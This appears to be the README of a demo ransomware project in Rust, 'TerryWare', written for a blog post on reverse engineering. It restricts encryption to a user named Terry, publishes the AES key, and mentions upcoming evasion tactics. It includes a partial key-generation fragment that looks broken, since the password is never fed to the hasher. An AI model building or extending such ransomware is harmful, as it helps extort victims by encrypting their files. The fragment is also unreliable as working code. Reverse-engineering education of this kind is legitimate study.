02/22/25: This repo is undergoing changes for new evasion tactics in my upcoming blog post
Ransomware I wrote in Rust to demo for my blog post on reverse engineering
I'm not a great programmer, I only have experience with scripting, so apologies for the sloppy code.
TerryWare Demo:
Ransomware is designed to only trigger for Windows users named 'Terry', and it will only encrypt files under (C:\Users\Terry\*).
The key for decryption is: e558e84dba2de0209ce8d1ec73db5d3b, stemming from the first 16 bytes of 'terrypass' put through SHA256.
This is also the AES-128 key used for encrypting files.
fn generate_aes_key() -> [u8; 16] {
let dictionary = ["t", "e", "r", "r", "y", "p", "a", "s", "s"];
let password = dictionary.join("");
let mut hasher = Sha256::new();
let result = hasher.finalize();
let mut key = [0u8; 16];
Idov31 for inspiring the functionality of encrypt()/decrypt() functions
TCM Security for a great Rust course